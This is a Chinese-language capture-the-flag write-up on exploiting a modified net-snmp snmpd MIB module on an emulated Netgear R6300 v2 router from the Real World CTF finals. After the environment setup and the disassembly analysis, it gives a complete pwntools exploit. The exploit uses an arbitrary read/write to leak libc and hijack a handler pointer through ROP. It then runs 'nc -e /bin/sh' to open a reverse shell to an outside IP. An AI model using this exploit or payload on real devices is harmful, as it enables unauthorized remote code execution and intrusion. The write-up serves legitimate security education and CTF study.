最近时间比较多,把去年Real World总决赛的路由器重新调了一遍
Building Environment
因为我最后没有拿路由器,所以需要先搭建好整个模拟路由环境启动snmp服务
路由器版本:
Netgear R6300 v2
#https://openwrt.org/toh/netgear/netgear_r6300_v2
首先下载openwrt的源码(18.06.1和18.06.2皆可,只是最后EXP中偏移可能不同)
配置config:
Target System: BCM47XX/53XX
Target Profile: Netgear R6300 v2
Target Images: squashfs //生成文件系统即可
Development: gdb&&gdbserver //便于后续调试
而后保存配置并编译
在编译好的文件中找到编译好的文件系统:
# ls
bin etc mnt proc root sys usr www
dev lib overlay rom sbin tmp var
有两个思路:
通过文件系统制作镜像,再用qemu启动 #没有成功
在qemu启动的arm虚拟机或者可以运行arm的环境下chroot开启整个环境
我选择直接在树莓派中搭建环境
(也可以在qemu system mode下的arm虚拟机中启动,后面有说明)
将文件系统整个放入树莓派中(包括比赛的两个ipk包):
而后配置chroot环境:
sudo mount proc chroot_dir/proc -t proc
sudo mount sysfs chroot_dir/sys -t sysfs
cp /etc/hosts chroot_dir/etc/hosts #配置网络环境
编辑 chroot_dir/etc/resolv.conf: #配置DNS环境
nameserver 8.8.8.8
开启chroot环境:
sudo chroot . ./bin/sh
而后安装比赛的snmp环境:
opkg install ./libnetsnmp_5.8-1_arm_cortex-a9.ipk
opkg install ./snmpd_5.8-1_arm_cortex-a9.ipk
#可能存在报错无法建立配置文件,在var下建立run文件夹即可
确认snmp服务启动:
路由器环境端:
/ # netstat -anp|grep snmpd
udp 0 0 0.0.0.0:161 0.0.0.0:* 1922/snmpd
udp 0 0 :::161 :::* 1922/snmpd
unix 2 [ ACC ] STREAM LISTENING 18493 1922/snmpd /var/run/agentx.sock
本机端:
kirin@kirin-virtual-machine:~$ snmpwalk -v 1 -c public 192.168.137.33 .1
iso.3.6.1.4.1.2021.13.32.1.0 = INTEGER: 0
iso.3.6.1.4.1.2021.13.32.2.0 = INTEGER: 1996043560
End of MIB
同样得,在qemu system模式下启动的arm虚拟机也可以启动服务:
下载内核&&镜像
https://people.debian.org/~aurel32/qemu/armhf/
配置qemu虚拟机网络:
https://kirin-say.top/2019/02/23/Building-MIPS-Environment-for-Router-PWN/
启动qemu虚拟机:
sudo qemu-system-arm -M vexpress-a9 -kernel vmlinuz-3.2.0-4-vexpress -initrd initrd.img-3.2.0-4-vexpress -drive if=sd,file=debian_wheezy_armhf_standard.qcow2 -append "root=/dev/mmcblk0p2" -net nic,macaddr=00:16:3e:00:00:01 -net tap
启动服务后同样配置chroot环境运行即可
Find R/W at Any Address in MIB
在搭建的路由器环境下gdbserver运行snmpd,IDA下动态调试追踪程序流
可以看到snmp服务会先初始化mib,agent等环境:
LOAD:000125B8 BL init_mib_modules
LOAD:000125BC LDR R0, [R10]
LOAD:000125C0 BL init_snmp
LOAD:000125C4 BL init_master_agent
在init_mib_modules中可以看到:
int init_mib_modules()
{
int result; // r0
int v1; // r3
result = should_init();
if ( result )
result = j_init_greatSensors();
v1 = dword_1102C;
dword_11028 = 1;
if ( !dword_1102C )
{
dword_1102C = 1;
result = snmp_register_callback(v1, 2, (int)sub_9D4);
if ( result )
result = snmp_log(3, "error registering for SHUTDOWN callback for mib modules\n");
}
return result;
}
其会先调用init_greatSensors()注册回调函数:
LOAD:000008E0 init_greatSensors ; CODE XREF: j_init_greatSensors+8↑j
LOAD:000008E0 ; DATA XREF: LOAD:000002D8↑o ...
LOAD:000008E0
LOAD:000008E0 var_70 = -0x70
LOAD:000008E0 var_64 = -0x64
LOAD:000008E0 var_60 = -0x60
LOAD:000008E0 var_38 = -0x38
LOAD:000008E0
LOAD:000008E0 LDR R12, =(dword_A88 - 0x8FC)
LOAD:000008E4 STMFD SP!, {R4,R5,LR}
LOAD:000008E8 SUB SP, SP, #0x64
LOAD:000008EC ADD LR, SP, #0x70+var_60
LOAD:000008F0 LDR R5, =(_GLOBAL_OFFSET_TABLE_ - 0x90C)
LOAD:000008F4 ADD R12, PC, R12 ; dword_A88
LOAD:000008F8 MOV R4, R12
LOAD:000008FC ADD R12, R12, #0x28
LOAD:00000900 LDMIA R4!, {R0-R3}
LOAD:00000904 ADD R5, PC, R5 ; _GLOBAL_OFFSET_TABLE_
LOAD:00000908 STMIA LR!, {R0-R3}
LOAD:0000090C LDMIA R4!, {R0-R3}
LOAD:00000910 STMIA LR!, {R0-R3}
LOAD:00000914 LDMIA R4, {R0,R1}
LOAD:00000918 MOV R4, #3
LOAD:0000091C STMIA LR, {R0,R1}
LOAD:00000920 ADD LR, SP, #0x70+var_38
LOAD:00000924 LDMIA R12!, {R0-R3}
LOAD:00000928 STMIA LR!, {R0-R3}
LOAD:0000092C LDMIA R12!, {R0-R3}
LOAD:00000930 STMIA LR!, {R0-R3}
LOAD:00000934 ADD R2, SP, #0x70+var_60
LOAD:00000938 LDMIA R12, {R0,R1}
LOAD:0000093C LDR R3, =(off_10FFC - 0x10FAC)
LOAD:00000940 STMIA LR, {R0,R1}
LOAD:00000944 LDR R0, =(aGreatmiscsenso - 0x958)
LOAD:00000948 LDR R3, [R5,R3] ; handle_greatMiscSensorsDevice
LOAD:0000094C STR R4, [SP,#0x70+var_70]
LOAD:00000950 ADD R0, PC, R0 ; "greatMiscSensorsDevice"
LOAD:00000954 STR R3, [SP,#0x70+var_64]
LOAD:00000958 MOV R3, #0xA
LOAD:0000095C LDR R1, [SP,#0x70+var_64]
LOAD:00000960 BL netsnmp_create_handler_registration
LOAD:00000964 BL netsnmp_register_scalar
LOAD:00000968 LDR R3, =(off_10FF0 - 0x10FAC)
LOAD:0000096C ADD R2, SP, #0x70+var_38
LOAD:00000970 LDR R0, =(aGreatmiscsenso_0 - 0x980)
LOAD:00000974 LDR R3, [R5,R3] ; handle_greatMiscSensorsIndex
LOAD:00000978 ADD R0, PC, R0 ; "greatMiscSensorsIndex"
LOAD:0000097C STR R4, [SP,#0x70+var_70]
LOAD:00000980 STR R3, [SP,#0x70+var_64]
LOAD:00000984 MOV R3, #0xA
LOAD:00000988 LDR R1, [SP,#0x70+var_64]
LOAD:0000098C BL netsnmp_create_handler_registration
LOAD:00000990 BL netsnmp_register_scalar
LOAD:00000994 MOV R0, #0x78 ; 'x' ; size_t
LOAD:00000998 BL malloc
LOAD:0000099C LDR R3, =(vla_str - 0x9AC)
LOAD:000009A0 MOV R2, #0
LOAD:000009A4 ADD R3, PC, R3 ; vla_str
LOAD:000009A8 STR R0, [R3,#(mib_address - 0x11020)]
LOAD:000009AC STR R2, [R3]
LOAD:000009B0 ADD SP, SP, #0x64
LOAD:000009B4 LDMFD SP!, {R4,R5,PC}
LOAD:000009B4 ; End of function init_greatSensors
可以看到其注册了两个回调函数,动态调试下看到注册过程:
int __fastcall sub_76F59344(int a1, int a2, int a3, int a4)
{
int v4; // r5@1
int v5; // r6@1
int v6; // r7@1
int v7; // r4@1
int v8; // r5@2
v4 = a1;
v5 = a3;
v6 = a4;
v7 = ((int (__cdecl *)(int, int, int))unk_76F4D74C)(a1, a2, a3);
if ( v7 )
{
v8 = ((int (__fastcall *)(int, int, int, int))unk_76F4C0D8)(v4, v7, v5, v6);
if ( !v8 )
((void (__fastcall *)(int))unk_76F4C228)(v7);
}
else
{
v8 = 0;
}
return v8;
}
首先是写入函数地址:
而后函数名称:
而后mib对象对应的OID:
可以看到此OID:1.3.6.1.4.1.2021.13.32.2.0
当利用snmpset/snmpget对此对象进行读写操作时,会利用netsnmp_call_handler函数处理对象,最终调用对应此OID的回调函数:handle_greatMiscSensorsDevice函数
netsnmp_call_handler关键部分:
v10 = (int (__fastcall *)(int *, int, int *, int))v8[3];
if ( !v10 )
break;
se_find_label_in_slist((int)"agent_mode", *v6);
result = v10(v8, v9, v6, v7);
v12 = v8[2];
同样另一个回调函数handle_greatMiscSensorsIndex对应OID:
即:1.3.6.1.4.1.2021.13.32.1.0
这时候关注两个回调函数,发现了任意地址读写:
handle_greatMiscSensorsDevice:
int __fastcall handle_greatMiscSensorsDevice(int a1, int a2, signed int *a3, _DWORD *a4)
{
signed int v4; // r4
int result; // r0
int v6; // r0
int v7; // r3
const char *v8; // r2
int v9; // r1
v4 = *a3;
if ( *a3 == 2 )
{
if ( vla_str <= 29 )
{
*(_DWORD *)(mib_address + 4 * vla_str) = **(_DWORD **)(*a4 + 16);
return 0;
}
LABEL_15:
netsnmp_set_request_error();
return 0;
}
if ( *a3 > 2 )
{
if ( v4 > 5 )
{
if ( v4 != 160 )
goto LABEL_5;
v6 = *a4;
if ( vla_str > 29 )
{
v7 = 7;
v9 = 4;
v8 = "Go Back";
}
else
{
v7 = 4;
v8 = (const char *)(mib_address + 4 * vla_str);
v9 = 2;
}
snmp_set_var_typed_value(v6, v9, (int)v8, v7);
}
return 0;
}
if ( v4 )
{
if ( v4 != 1 )
{
LABEL_5:
snmp_log(3, "unknown mode (%d) in handle_greatMiscSensorsDevice\n", *a3);
return 5;
}
return 0;
}
result = netsnmp_check_vb_type(*a4, 2);
if ( result )
goto LABEL_15;
return result;
}
handle_greatMiscSensorsIndex:
int __fastcall handle_greatMiscSensorsIndex(int a1, int a2, signed int *a3, _DWORD *a4)
{
signed int v4; // r4
int result; // r0
v4 = *a3;
if ( *a3 == 2 )
{
vla_str = **(_DWORD **)(*a4 + 16);
return 0;
}
if ( *a3 > 2 )
{
if ( v4 > 5 )
{
if ( v4 != 0xA0 )
goto LABEL_5;
snmp_set_var_typed_value(*a4, 2, (int)&vla_str, 4);// (netsnmp_variable_list *newvar, u_char type, const void *val_str, size_t val_len)
}
return 0;
}
if ( v4 )
{
if ( v4 != 1 )
{
LABEL_5:
snmp_log(3, "unknown mode (%d) in handle_greatMiscSensorsDevice\n", *a3);
return 5;
}
return 0;
}
result = netsnmp_check_vb_type(*a4, 2);
if ( result )
{
netsnmp_set_request_error();
return 0;
}
return result;
}
可以看到handle_greatMiscSensorsDevice中:
当使用snmpset写对象时,
#*a3从0循环->0 1 2 3 0 1 2 3......
if ( *a3 == 2 )
{
if ( vla_str <= 29 )
{
*(_DWORD *)(mib_address + 4 * vla_str) = **(_DWORD **)(*a4 + 16);
return 0;
}
mid_address是在snmp服务启动mib初始化时在init_greatSensors中:
result = malloc(0x78u);
mib_address = (int)result;
vla_str = 0;
而val_str在handle_greatMiscSensorsIndex中可以进行设置:
vla_str = **(_DWORD **)(*a4 + 16);
即我们对OID对象1.3.6.1.4.1.2021.13.32.1.0设置的值
所以当我们依次调用handle_greatMiscSensorsIndex进行设置vla_str,此值只需小于29(在这里设置为负数即可),而后调用handle_greatMiscSensorsDevice即可实现任意地址写
任意地址读相同原理,当snmpget读取对象时,会调用:
#v8 = (const char *)(mib_address + 4 * vla_str);
#这里同样检测vla_str是否大于29,设置为负数即可
snmp_set_var_typed_value(v6, v9, (int)v8, v7)
即会将对象的值设置我们构造地址处的值
而后取出对象value返回给snmpget完成任意地址读
POC
首先需要leak libc
想到注册回调函数位置
利用任意地址读找到注册函数保存地址来leak libc
hex(0x76F5F9F0-0x76F5F40c)=0x5e4
而后再次利用handle来劫持程序流,即netsnmp_call_handler中:
v10 = (int (__fastcall *)(int *, int, int *, int))v8[3];
if ( !v10 )
break;
se_find_label_in_slist((int)"agent_mode", *v6);
result = v10(v8, v9, v6, v7);
v12 = v8[2];
这时候只需要事先布置好一条ROP链,最后将handle改为我们的rop chain地址即可劫持程序流,最终达到RCE:
ROPgadget --binary ./libc.so
......
0x000596bc : ldr r3, [pc, #0x3c] ; ldr r2, [pc, #0x3c] ; add r3, pc, r3 ; ldr r0, [pc, r2] ; ldr r3, [r3] ; blx r3
......
在这里可以先将r3,r2值分别设置为&system function,&shell
修改handle并再次对snmp对象操作便可达到RCE
#也可以选择其他ROP链,构造可以system(shell)即可
最终POC:
#针对我模拟的路由环境,具体情况可能需要修改偏移
from pwn import *
import sys
import os
#context.log_level="debug"
def read(ip,offset):
cmd1="snmpset -v 1 -c public %s 1.3.6.1.4.1.2021.13.32.1.0 i %s" %(ip,offset/4)
cmd2="snmpget -v 1 -c public %s 1.3.6.1.4.1.2021.13.32.2.0" %ip
os.system(cmd1)
p2=process(cmd2,shell=True)
p2.recvuntil("INTEGER: ")
leak=int(p2.recvuntil("\n").strip())
p2.close()
return leak
def write(ip,offset,note):
cmd1="snmpset -v 1 -c public %s 1.3.6.1.4.1.2021.13.32.1.0 i %s" %(ip,offset/4)
cmd2="snmpset -v 1 -c public %s 1.3.6.1.4.1.2021.13.32.2.0 i %s" %(ip,note)
os.system(cmd1)
sleep(0.5)
os.system(cmd2)
def get_shell(ip):
cmd="snmpget -v 1 -c public %s 1.3.6.1.4.1.2021.13.32.1.0" %ip
os.system(cmd)
if __name__=="__main__":
ip=sys.argv[1]
#leak addr
handle_addr=read(ip,-0x5e4)
mibso_base=handle_addr-0x818
libcso_base=handle_addr+0x507e8
log.info("mibso_base="+hex(mibso_base))
log.info("libcso_base="+hex(libcso_base))
system_addr=libcso_base+0x43210
ropchain_addr=libcso_base+0x596bc
r3_addr=libcso_base+0x80394
r2_addr=libcso_base+0x80398
#build rop chain
base=mibso_base+0xd29f0
cmd_addr=libcso_base+0x80420
write(ip,r3_addr-base,system_addr)
write(ip,r2_addr-base,cmd_addr)
cmd="nc -e /bin/sh 192.168.160.131 1234\x00" #the shell you want run in router
#padding
cmd+="1"
time=len(cmd)/4
cmd=cmd.ljust((time+1)*4,"1")
for i in range(time):
write(ip,cmd_addr+i*4-base,u32(cmd[i*4:i*4+4]))
write(ip,-0x5e4,ropchain_addr)
get_shell(ip)
Run POC&&Get Shell
python payload.py router_ip